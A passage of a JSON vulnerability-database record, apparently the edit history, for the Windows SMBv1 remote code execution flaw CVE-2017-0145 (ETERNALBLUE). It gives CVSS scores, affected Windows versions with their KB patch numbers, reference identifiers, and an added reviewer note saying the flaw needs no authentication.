Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": 
"KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T08:55:45", "differentElements": ["msAffectedSoftware"], "edition": 8}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": 
{"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-04T14:46:24", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", 
"AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T14:46:24", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-04T14:46:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012212", "KB4012215", "KB4012217", "KB4014077", "KB4012606", "KB4012216", "KB4013429", "KBMS16-110, 3187754", "KB4012214", "KB4012213", "KB3210721", "KB3205401", "KB4012598", "KB3210720", "KB3213986", "KB3205409", "KB3212646", "KB4013198", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service 
Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 
Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", 
"msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit 
systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T14:46:24", "differentElements": ["msAffectedSoftware"], "edition": 9}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server. [Reviewer note: the CVSS vectors stored in this record (v2 Au:N, v3 PR:N) say no authentication is required, and the linked ETERNALBLUE entry SSV:92952 describes remote, unauthenticated RCE; do not scope exposure to credentialed attackers, and treat any SMBv1 server reachable from an untrusted network as exploitable until the corresponding update from this record's kbList is installed.]\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-04T16:51:19", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", 
"1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T16:51:19", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-04T16:51:19", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3205409", "KB3213986", "KB4013429", "KB4012213", "KB4012606", "KB4012215", "KBMS16-110, 3187754", "KB4012216", "KB4012212", "KB3210720", "KB3212646", "KB4012214", "KB3177186", "KB4014077", "KB3210721", "KB4012217", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T16:51:19", "differentElements": ["msAffectedSoftware"], "edition": 10}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A 
remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server. [Reviewer note: the CVSS vectors stored in this record (v2 Au:N, v3 PR:N) say no authentication is required, and the linked ETERNALBLUE entry SSV:92952 describes remote, unauthenticated RCE; do not scope exposure to credentialed attackers, and treat any SMBv1 server reachable from an untrusted network as exploitable until the corresponding update from this record's kbList is installed.]\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 